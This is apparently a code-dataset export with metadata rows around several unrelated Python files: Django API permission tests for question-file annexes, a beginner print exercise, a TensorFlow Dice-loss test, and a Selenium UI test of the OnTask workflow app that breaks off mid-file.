| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f7ee6e9933cd0117ae68c10e8ce70eb8c3e275e
| 14,347
|
py
|
Python
|
control/tests/test_api_question_file.py
|
SocialGouv/ecollecte
|
1bfce2e0700b563c111c11452356b46ecb2630e4
|
[
"MIT"
] | 9
|
2018-11-28T07:36:37.000Z
|
2022-02-04T12:56:11.000Z
|
control/tests/test_api_question_file.py
|
betagouv/e-controle
|
b6f790ca2590ac257a47930a1e521b86ce3edb29
|
[
"MIT"
] | 154
|
2018-11-22T14:41:17.000Z
|
2022-02-12T08:48:57.000Z
|
control/tests/test_api_question_file.py
|
betagouv/e-controle
|
b6f790ca2590ac257a47930a1e521b86ce3edb29
|
[
"MIT"
] | 10
|
2018-11-13T06:57:10.000Z
|
2022-03-21T13:04:49.000Z
|
from pytest import mark
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from rest_framework.test import APIClient
from control.models import Control, QuestionFile, Questionnaire
from tests import factories, utils
from user_profiles.models import UserProfile
pytestmark = mark.django_db
client = APIClient()
User = get_user_model()
## List API
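# Note: 'annexe' is the API route basename these tests use for QuestionFile
# resources (e.g. 'api:annexe-list', 'api:annexe-detail').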
def list_annexes(user):
    utils.login(client, user=user)
    url = reverse('api:annexe-list')
    return client.get(url)


def list_annexes_for_question(user, questionId):
    utils.login(client, user=user)
    url = f"{reverse('api:annexe-list')}?question={questionId}"
    return client.get(url)
def test_inspector_can_list_question_file_from_draft_questionnaire():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)

    published_question_file = factories.QuestionFileFactory()
    published_questionnaire = published_question_file.question.theme.questionnaire
    published_questionnaire.is_draft = False
    published_questionnaire.save()
    assert Questionnaire.objects.get(id=published_questionnaire.id).is_published
    inspector.controls.add(published_questionnaire.control)

    draft_question_file = factories.QuestionFileFactory()
    draft_questionnaire = draft_question_file.question.theme.questionnaire
    draft_questionnaire.is_draft = True
    draft_questionnaire.save()
    assert Questionnaire.objects.get(id=draft_questionnaire.id).is_draft
    inspector.controls.add(draft_questionnaire.control)

    response = list_annexes(inspector.user)

    assert response.status_code == 200
    assert published_question_file.file.name in str(response.content)
    assert draft_question_file.file.name in str(response.content)
    assert len(response.data) == 2


def test_audited_cannot_list_question_file_from_draft_questionnaire():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)

    published_question_file = factories.QuestionFileFactory()
    published_questionnaire = published_question_file.question.theme.questionnaire
    published_questionnaire.is_draft = False
    published_questionnaire.save()
    assert Questionnaire.objects.get(id=published_questionnaire.id).is_published
    audited.controls.add(published_questionnaire.control)

    draft_question_file = factories.QuestionFileFactory()
    draft_questionnaire = draft_question_file.question.theme.questionnaire
    draft_questionnaire.is_draft = True
    draft_questionnaire.save()
    assert Questionnaire.objects.get(id=draft_questionnaire.id).is_draft
    audited.controls.add(draft_questionnaire.control)

    response = list_annexes(audited.user)

    assert response.status_code == 200
    assert published_question_file.file.name in str(response.content)
    assert draft_question_file.file.name not in str(response.content)
    assert len(response.data) == 1


def test_audited_cannot_list_question_file_by_question_from_draft_questionnaire():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)

    draft_question_file = factories.QuestionFileFactory()
    draft_questionnaire = draft_question_file.question.theme.questionnaire
    draft_questionnaire.is_draft = True
    draft_questionnaire.save()
    assert Questionnaire.objects.get(id=draft_questionnaire.id).is_draft
    audited.controls.add(draft_questionnaire.control)

    response = list_annexes_for_question(audited.user, draft_question_file.question.id)

    assert response.status_code == 200
    assert len(response.data) == 0
    assert draft_question_file.file.name not in str(response.content)


def test_cannot_list_question_file_by_question_from_deleted_control():
    deleted_question_file = factories.QuestionFileFactory()
    deleted_control = deleted_question_file.question.theme.questionnaire.control
    deleted_control.delete()
    assert Control.objects.get(id=deleted_control.id).is_deleted

    # Audited
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    audited.controls.add(deleted_control)

    response = list_annexes_for_question(audited.user, deleted_question_file.question.id)

    assert response.status_code == 200
    assert len(response.data) == 0
    assert deleted_question_file.file.name not in str(response.content)

    # Inspector
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    inspector.controls.add(deleted_control)

    response = list_annexes_for_question(inspector.user, deleted_question_file.question.id)

    assert response.status_code == 200
    assert len(response.data) == 0
    assert deleted_question_file.file.name not in str(response.content)
### Retrieve API endpoint closed.
def get_question_file(user, id):
    return utils.get_resource(client, user, 'annexe', id)


def update_question_file(user, payload):
    return utils.update_resource(client, user, 'annexe', payload)


def test_cannot_get_question_file_even_if_user_belongs_to_control():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    question_file = factories.QuestionFileFactory()
    questionnaire = question_file.question.theme.questionnaire
    inspector.controls.add(questionnaire.control)
    audited.controls.add(questionnaire.control)
    questionnaire.is_draft = False
    questionnaire.save()
    assert Questionnaire.objects.get(id=questionnaire.id).is_published

    # method not allowed
    assert get_question_file(inspector.user, question_file.id).status_code == 405
    assert get_question_file(audited.user, question_file.id).status_code == 405


def test_cannot_get_inexistant_question_file():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)

    # method not allowed
    assert get_question_file(inspector.user, 21038476187629481736498376).status_code == 405


def test_cannot_get_question_file_if_control_is_deleted():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question_file = factories.QuestionFileFactory()
    inspector.controls.add(question_file.question.theme.questionnaire.control)
    question_file.question.theme.questionnaire.control.delete()

    # method not allowed
    assert get_question_file(inspector.user, question_file.id).status_code == 405


def test_audited_cannot_get_question_file_from_draft_questionnaire():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    question_file = factories.QuestionFileFactory()
    audited.controls.add(question_file.question.theme.questionnaire.control)
    question_file.question.theme.questionnaire.is_draft = True
    question_file.question.theme.questionnaire.save()
    assert Questionnaire.objects.get(id=question_file.question.theme.questionnaire.id).is_draft

    # method not allowed
    assert get_question_file(audited.user, question_file.id).status_code == 405


def test_inspector_cannot_update_question_file_from_published_questionnaire():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question_file = factories.QuestionFileFactory()
    questionnaire = question_file.question.theme.questionnaire
    inspector.controls.add(questionnaire.control)
    questionnaire.is_draft = False
    questionnaire.save()
    assert Questionnaire.objects.get(id=questionnaire.id).is_published
    payload = {
        "id": question_file.id,
        "question": question_file.question.id + 1
    }

    # method not allowed
    assert update_question_file(inspector.user, payload).status_code == 405


def test_audited_cannot_update_question_file_from_published_questionnaire():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    question_file = factories.QuestionFileFactory()
    questionnaire = question_file.question.theme.questionnaire
    audited.controls.add(questionnaire.control)
    questionnaire.is_draft = False
    questionnaire.save()
    assert Questionnaire.objects.get(id=questionnaire.id).is_published
    payload = {
        "id": question_file.id,
        "question": question_file.question.id + 1
    }

    # forbidden
    assert update_question_file(audited.user, payload).status_code == 403


def test_audited_cannot_update_question_file_from_draft_questionnaire():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    question_file = factories.QuestionFileFactory()
    questionnaire = question_file.question.theme.questionnaire
    audited.controls.add(questionnaire.control)
    questionnaire.is_draft = True
    questionnaire.save()
    assert Questionnaire.objects.get(id=questionnaire.id).is_draft
    payload = {
        "id": question_file.id,
        "question": question_file.question.id + 1
    }

    # Forbidden
    assert update_question_file(audited.user, payload).status_code == 403
### Upload API
def test_inspector_can_upload_question_file():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question = factories.QuestionFactory()
    questionnaire = question.theme.questionnaire
    questionnaire.is_draft = True
    questionnaire.save()
    inspector.controls.add(questionnaire.control)
    utils.login(client, user=inspector.user)
    url = reverse('api:annexe-list')
    count_before = QuestionFile.objects.count()
    post_data = {
        'file': factories.dummy_file.open(),
        'question': [question.id]
    }

    response = client.post(url, post_data, format='multipart')

    assert response.status_code == 201
    count_after = QuestionFile.objects.count()
    assert count_after == count_before + 1


def test_inspector_cannot_upload_question_file_to_published_questionnaire():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question = factories.QuestionFactory()
    questionnaire = question.theme.questionnaire
    questionnaire.is_draft = False
    questionnaire.save()
    inspector.controls.add(questionnaire.control)
    utils.login(client, user=inspector.user)
    url = reverse('api:annexe-list')
    count_before = QuestionFile.objects.count()
    post_data = {
        'file': factories.dummy_file.open(),
        'question': [question.id]
    }

    response = client.post(url, post_data, format='multipart')

    assert response.status_code == 403
    count_after = QuestionFile.objects.count()
    assert count_after == count_before


def test_inspector_can_remove_question_file():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question_file = factories.QuestionFileFactory()
    questionnaire = question_file.question.theme.questionnaire
    questionnaire.is_draft = True
    questionnaire.save()
    inspector.controls.add(questionnaire.control)
    utils.login(client, user=inspector.user)
    url = reverse('api:annexe-detail', args=[question_file.id])
    count_before = QuestionFile.objects.count()

    response = client.delete(url)

    assert response.status_code == 204
    count_after = QuestionFile.objects.count()
    assert count_after == count_before - 1


def test_inspector_cannot_remove_question_file_if_control_is_published():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question_file = factories.QuestionFileFactory()
    questionnaire = question_file.question.theme.questionnaire
    questionnaire.is_draft = False
    questionnaire.save()
    inspector.controls.add(questionnaire.control)
    utils.login(client, user=inspector.user)
    url = reverse('api:annexe-detail', args=[question_file.id])
    count_before = QuestionFile.objects.count()

    response = client.delete(url)

    assert response.status_code == 403
    count_after = QuestionFile.objects.count()
    assert count_after == count_before


def test_inspector_cannot_remove_question_file_if_control_is_deleted():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question_file = factories.QuestionFileFactory()
    inspector.controls.add(question_file.question.theme.questionnaire.control)
    utils.login(client, user=inspector.user)
    url = reverse('api:annexe-detail', args=[question_file.id])
    count_before = QuestionFile.objects.count()
    question_file.question.theme.questionnaire.control.delete()

    response = client.delete(url)

    assert response.status_code == 404
    count_after = QuestionFile.objects.count()
    assert count_after == count_before


def test_cannot_upload_question_file_if_control_is_deleted():
    inspector = factories.UserProfileFactory(profile_type=UserProfile.INSPECTOR)
    question = factories.QuestionFactory()
    inspector.controls.add(question.theme.questionnaire.control)
    utils.login(client, user=inspector.user)
    url = reverse('api:annexe-list')
    post_data = {
        'file': factories.dummy_file.open(),
        'question': [question.id]
    }
    question.theme.questionnaire.control.delete()

    response = client.post(url, post_data, format='multipart')

    assert response.status_code == 403


def test_audited_cannot_upload_question_file():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    question = factories.QuestionFactory()
    audited.controls.add(question.theme.questionnaire.control)
    utils.login(client, user=audited.user)
    url = reverse('api:annexe-list')
    count_before = QuestionFile.objects.count()
    post_data = {
        'file': factories.dummy_file.open(),
        'question': [question.id]
    }

    response = client.post(url, post_data, format='multipart')

    assert response.status_code == 403
    count_after = QuestionFile.objects.count()
    assert count_after == count_before


def test_audited_cannot_remove_question_file():
    audited = factories.UserProfileFactory(profile_type=UserProfile.AUDITED)
    question_file = factories.QuestionFileFactory()
    audited.controls.add(question_file.question.theme.questionnaire.control)
    utils.login(client, user=audited.user)
    url = reverse('api:annexe-detail', args=[question_file.id])
    count_before = QuestionFile.objects.count()

    response = client.delete(url)

    assert response.status_code == 403
    count_after = QuestionFile.objects.count()
    assert count_after == count_before
| 37.755263
| 95
| 0.775354
| 1,650
| 14,347
| 6.494545
| 0.067273
| 0.100784
| 0.050392
| 0.074468
| 0.897536
| 0.882699
| 0.866275
| 0.811124
| 0.781728
| 0.756346
| 0
| 0.007978
| 0.135081
| 14,347
| 379
| 96
| 37.854881
| 0.855589
| 0.012616
| 0
| 0.727941
| 0
| 0
| 0.022547
| 0.003534
| 0
| 0
| 0
| 0
| 0.1875
| 1
| 0.084559
| false
| 0
| 0.025735
| 0.007353
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7f8232bbb830d04a89909ffff83c22e464a7d30d
| 658
|
py
|
Python
|
own_practice/two_twelve.py
|
Ellis0817/Introduction-to-Programming-Using-Python
|
1882a2a846162d5ff56d4d56c3940b638ef408bd
|
[
"MIT"
] | null | null | null |
own_practice/two_twelve.py
|
Ellis0817/Introduction-to-Programming-Using-Python
|
1882a2a846162d5ff56d4d56c3940b638ef408bd
|
[
"MIT"
] | 4
|
2019-11-07T12:32:19.000Z
|
2020-07-19T14:04:44.000Z
|
own_practice/two_twelve.py
|
Ellis0817/Introduction-to-Programming-Using-Python
|
1882a2a846162d5ff56d4d56c3940b638ef408bd
|
[
"MIT"
] | 5
|
2019-12-04T15:56:55.000Z
|
2022-01-14T06:19:18.000Z
|
"""
程式設計練習題 2.2-2.10 2.12 列印表格.
請撰寫一程式,顯示以下這個表格:
```
a b a ** b
1 2 1
2 3 8
3 4 81
4 5 1024
5 6 15625
```
"""
A_PRINT = 1
B_PRINT = 2
AB = A_PRINT ** B_PRINT
print("a", "b", "a ** b")
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
A_PRINT += 1
B_PRINT += 1
AB = A_PRINT ** B_PRINT
print(A_PRINT, B_PRINT, AB)
| 14.304348
| 27
| 0.588146
| 136
| 658
| 2.580882
| 0.147059
| 0.324786
| 0.239316
| 0.410256
| 0.817664
| 0.780627
| 0.780627
| 0.723647
| 0.723647
| 0.723647
| 0
| 0.088843
| 0.264438
| 658
| 45
| 28
| 14.622222
| 0.636364
| 0.227964
| 0
| 0.88
| 0
| 0
| 0.016
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.28
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f69ce4649d313633435c0a82a4defb358ff6ed08
| 54
|
py
|
Python
|
projects/mypackage/__init__.py
|
monaen/DHLO2021-2021Spring
|
4953e0305b5b9b01341345c25933c1f2d0224104
|
[
"Apache-2.0"
] | 2
|
2021-03-03T06:19:36.000Z
|
2021-09-27T09:47:00.000Z
|
projects/mypackage/__init__.py
|
monaen/DHLO2021-2021Spring
|
4953e0305b5b9b01341345c25933c1f2d0224104
|
[
"Apache-2.0"
] | null | null | null |
projects/mypackage/__init__.py
|
monaen/DHLO2021-2021Spring
|
4953e0305b5b9b01341345c25933c1f2d0224104
|
[
"Apache-2.0"
] | null | null | null |
from . import generate_num
from . import print_results
| 27
| 27
| 0.833333
| 8
| 54
| 5.375
| 0.75
| 0.465116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 54
| 2
| 27
| 27
| 0.914894
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
12431a4f4d78b3a4fe80a92cbf0b4e13495035b1
| 3,710
|
py
|
Python
|
official/vision/beta/projects/volumetric_models/losses/segmentation_losses_test.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
official/vision/beta/projects/volumetric_models/losses/segmentation_losses_test.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
official/vision/beta/projects/volumetric_models/losses/segmentation_losses_test.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for segmentation_losses.py."""

from absl.testing import parameterized
import tensorflow as tf

from official.vision.beta.projects.volumetric_models.losses import segmentation_losses


class SegmentationLossDiceScoreTest(parameterized.TestCase, tf.test.TestCase):

  @parameterized.parameters((None, 0.5, 0.3), ('generalized', 0.5, 0.3),
                            ('adaptive', 0.5, 0.07))
  def test_supported_loss(self, metric_type, output, expected_score):
    loss = segmentation_losses.SegmentationLossDiceScore(
        metric_type=metric_type)
    logits = tf.constant(output, shape=[2, 128, 128, 128, 1], dtype=tf.float32)
    labels = tf.ones(shape=[2, 128, 128, 128, 1], dtype=tf.float32)
    actual_score = loss(logits=logits, labels=labels)
    self.assertAlmostEqual(actual_score.numpy(), expected_score, places=1)

  @parameterized.parameters((None, 0, 0), ('generalized', 0, 0),
                            ('adaptive', 0, 0))
  def test_supported_loss_zero_labels_logits(self, metric_type, output,
                                             expected_score):
    loss = segmentation_losses.SegmentationLossDiceScore(
        metric_type=metric_type)
    logits = tf.constant(output, shape=[2, 128, 128, 128, 1], dtype=tf.float32)
    labels = tf.zeros(shape=[2, 128, 128, 128, 1], dtype=tf.float32)
    actual_score = loss(logits=logits, labels=labels)
    self.assertAlmostEqual(actual_score.numpy(), expected_score, places=1)


if __name__ == '__main__':
  tf.test.main()
| 41.685393
| 87
| 0.712129
| 491
| 3,710
| 5.268839
| 0.250509
| 0.046386
| 0.006958
| 0.023193
| 0.947043
| 0.947043
| 0.947043
| 0.947043
| 0.947043
| 0.94627
| 0
| 0.051905
| 0.179515
| 3,710
| 88
| 88
| 42.159091
| 0.797963
| 0.313477
| 0
| 0.744186
| 0
| 0
| 0.030353
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 0
| null | null | 0
| 0.139535
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
89e54ee69b4064550fbd7562391336ba2a0d2bfd
| 46,560
|
py
|
Python
|
src/dataops/tests/test_views.py
|
Lukahm/ontask
|
f16bdaa06ea450ee56d4581340e611b1076bed16
|
[
"MIT"
] | 3
|
2018-08-24T10:48:40.000Z
|
2020-05-29T06:33:23.000Z
|
src/dataops/tests/test_views.py
|
Lukahm/ontask
|
f16bdaa06ea450ee56d4581340e611b1076bed16
|
[
"MIT"
] | null | null | null |
src/dataops/tests/test_views.py
|
Lukahm/ontask
|
f16bdaa06ea450ee56d4581340e611b1076bed16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import os
from django.conf import settings
from django.shortcuts import reverse
from django.utils.html import escape
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.ui import WebDriverWait
import test
from dataops import pandas_db
from workflow.models import Workflow
class DataopsSymbols(test.OntaskLiveTestCase):
    fixtures = ['wflow_symbols']
    filename = os.path.join(
        settings.BASE_DIR(),
        'dataops',
        'fixtures',
        'wflow_symbols_df.sql'
    )

    def setUp(self):
        super(DataopsSymbols, self).setUp()
        pandas_db.pg_restore_table(self.filename)

    def tearDown(self):
        pandas_db.delete_all_tables()
        super(DataopsSymbols, self).tearDown()

    def test_01_symbols(self):
        symbols = '!#$%&()*+,-./:;<=>?@[\]^_`{|}~'
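        # The names under test are ASCII punctuation characters; the
        # assertions further down check they round-trip (HTML-escaped)
        # through column and attribute names.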
# Login
self.login('instructor1@bogus.com')
self.open(reverse('workflow:index'))
# GO TO THE WORKFLOW PAGE
WebDriverWait(self.selenium, 10).until(
EC.title_is('OnTask :: Workflows'))
self.assertIn('New workflow', self.selenium.page_source)
self.assertIn('Import workflow', self.selenium.page_source)
# Open the workflow
wf_link = self.selenium.find_element_by_link_text('sss')
wf_link.click()
# Wait for the table to be refreshed
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Edit the name column
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/button"
).click()
self.selenium.find_element_by_xpath(
"//table[@id='column-table']/tbody/tr[4]/td[5]/div/ul/li[1]/button"
).click()
WebDriverWait(self.selenium, 10).until(
EC.visibility_of_element_located((By.ID, 'id_name'))
)
# Replace name by symbols
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
# Click in the submit/save button
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for the table to be refreshed
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'column-table_previous'))
)
# Click in the New Column button
self.selenium.find_element_by_class_name(
'js-workflow-column-add'
).click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Add column')
)
# Set name to symbols (new column) and type to string
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
self.selenium.find_element_by_id("id_data_type").click()
Select(self.selenium.find_element_by_id(
"id_data_type"
)).select_by_visible_text("string")
# Save the new column
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'error_1_id_name')))
# There should be a message saying that the name of this column already
# exists
self.assertIn('There is a column already with this name',
self.selenium.page_source)
# Click again in the name and introduce something different
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols + '2')
# Save the new column
self.selenium.find_element_by_xpath("//button[@type='submit']").click()
self.wait_close_modal_refresh_table('column-table_previous')
# Click in the attributes section
self.selenium.find_element_by_xpath(
"//div[@id='workflow-area']/div/button[3]"
).click()
self.selenium.find_element_by_link_text('Attributes').click()
WebDriverWait(self.selenium, 10).until(
EC.element_to_be_clickable((By.CLASS_NAME, 'js-attribute-create'))
)
# Delete the existing one and confirm deletion
self.selenium.find_element_by_xpath(
"//table[@id='attribute-table']/tbody/tr/td[3]/button[2]"
).click()
# Wait for the delete confirmation frame
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element((By.CLASS_NAME, 'modal-title'),
'Confirm attribute deletion')
)
# Click in the delete confirm button
self.selenium.find_element_by_xpath(
"//div[@class='modal-footer']/button[2]"
).click()
# MODAL WAITING
WebDriverWait(self.selenium, 10).until_not(
EC.presence_of_element_located(
(By.CLASS_NAME, 'modal-open')
)
)
# Wait for the table to be refreshed
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'attribute-table_previous'))
)
# Add a new attribute and insert key (symbols) and value
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
WebDriverWait(self.selenium, 10).until(
EC.text_to_be_present_in_element(
(By.XPATH, "//div[@id='modal-item']/div/div/form/div/h4"),
'Create attribute')
)
# Add key and value
self.selenium.find_element_by_id("id_key").click()
self.selenium.find_element_by_id("id_key").clear()
self.selenium.find_element_by_id("id_key").send_keys(symbols + '3')
self.selenium.find_element_by_id("id_value").click()
self.selenium.find_element_by_id("id_value").clear()
self.selenium.find_element_by_id("id_value").send_keys("vvv")
# Submit new attribute
self.selenium.find_element_by_xpath(
"//div[@class='modal-footer']/button[2]"
).click()
# MODAL WAITING
self.wait_close_modal_refresh_table('attribute-table_previous')
# Save and close the attribute page
self.selenium.find_element_by_link_text('Back').click()
# Wait for the details page
self.wait_close_modal_refresh_table('column-table_previous')
# Click in the TABLE link
self.selenium.find_element_by_link_text("Table").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'table-data_previous'))
)
# Verify that everything appears normally
self.assertIn(escape(symbols), self.selenium.page_source)
self.assertIn(escape(symbols + '2'), self.selenium.page_source)
# Click in the Actions navigation menu
self.selenium.find_element_by_link_text("Actions").click()
# Edit the action-in
self.selenium.find_element_by_link_text("Edit").click()
# Set the right columns to process
select = Select(self.selenium.find_element_by_id(
'select-column-name'))
select.select_by_visible_text(symbols + '2')
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located(
(By.ID, 'column-selected-table_previous'))
)
select = Select(self.selenium.find_element_by_id(
'select-key-column-name'))
select.select_by_visible_text('sid')
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located(
(By.ID, 'column-selected-table_previous'))
)
select = Select(self.selenium.find_element_by_id(
'select-key-column-name'))
select.select_by_visible_text('email')
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located(
(By.ID, 'column-selected-table_previous'))
)
# Save action-in
self.selenium.find_element_by_link_text('Done').click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Click in the RUN link of the action in
self.selenium.find_element_by_link_text("Run").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Enter data using the RUN menu. Select one entry to populate
self.selenium.find_element_by_link_text("student1@bogus.com").click()
self.selenium.find_element_by_id("id____ontask___select_2").click()
self.selenium.find_element_by_id("id____ontask___select_2").clear()
self.selenium.find_element_by_id("id____ontask___select_2").send_keys(
"Carmelo Coton2")
self.selenium.find_element_by_id("id____ontask___select_3").click()
self.selenium.find_element_by_id("id____ontask___select_3").clear()
self.selenium.find_element_by_id("id____ontask___select_3").send_keys(
"xxx"
)
# Submit the data for one entry
self.selenium.find_element_by_xpath(
"//body/div[4]/div/form/button[1]/span").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'actioninrun-data_previous'))
)
# Go Back to the action table
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
# Wait for paging widget
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'action-table_previous'))
)
# Edit the action out
self.selenium.find_element_by_xpath(
"//table[@id='action-table']/tbody/tr[2]/td[5]/div/a").click()
# Insert attribute
self.selenium.find_element_by_id("select-attribute-name").click()
Select(self.selenium.find_element_by_id(
"select-attribute-name")).select_by_visible_text("- Attribute -")
# Insert column name
self.selenium.find_element_by_id("select-column-name").click()
Select(self.selenium.find_element_by_id(
"select-column-name")).select_by_visible_text(symbols)
# Insert second column name
self.selenium.find_element_by_id("select-column-name").click()
Select(self.selenium.find_element_by_id(
"select-column-name")).select_by_visible_text(symbols + '2')
# Create new condition
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[3]").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_description_text')))
# Set the values of the condition
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols + "4")
self.selenium.find_element_by_id("id_description_text").click()
self.selenium.find_element_by_name("builder_rule_0_filter").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_filter")).select_by_visible_text(symbols)
self.selenium.find_element_by_name("builder_rule_0_operator").click()
Select(self.selenium.find_element_by_name(
"builder_rule_0_operator")).select_by_visible_text(
"begins with")
self.selenium.find_element_by_name("builder_rule_0_value_0").click()
self.selenium.find_element_by_name("builder_rule_0_value_0").clear()
self.selenium.find_element_by_name("builder_rule_0_value_0").send_keys(
"C")
# Save the condition
self.selenium.find_element_by_xpath(
"(//button[@type='submit'])[2]").click()
self.wait_close_modal_refresh_table('html-editor')
# Create a filter
self.selenium.find_element_by_xpath(
"(//button[@type='button'])[2]").click()
WebDriverWait(self.selenium, 10).until(
EC.presence_of_element_located((By.ID, 'id_description_text')))
# Fill in the details
self.selenium.find_element_by_id("id_name").click()
self.selenium.find_element_by_id("id_name").clear()
self.selenium.find_element_by_id("id_name").send_keys(symbols)
self.selenium.find_element_by_name("builder_rule_0_filter").click()
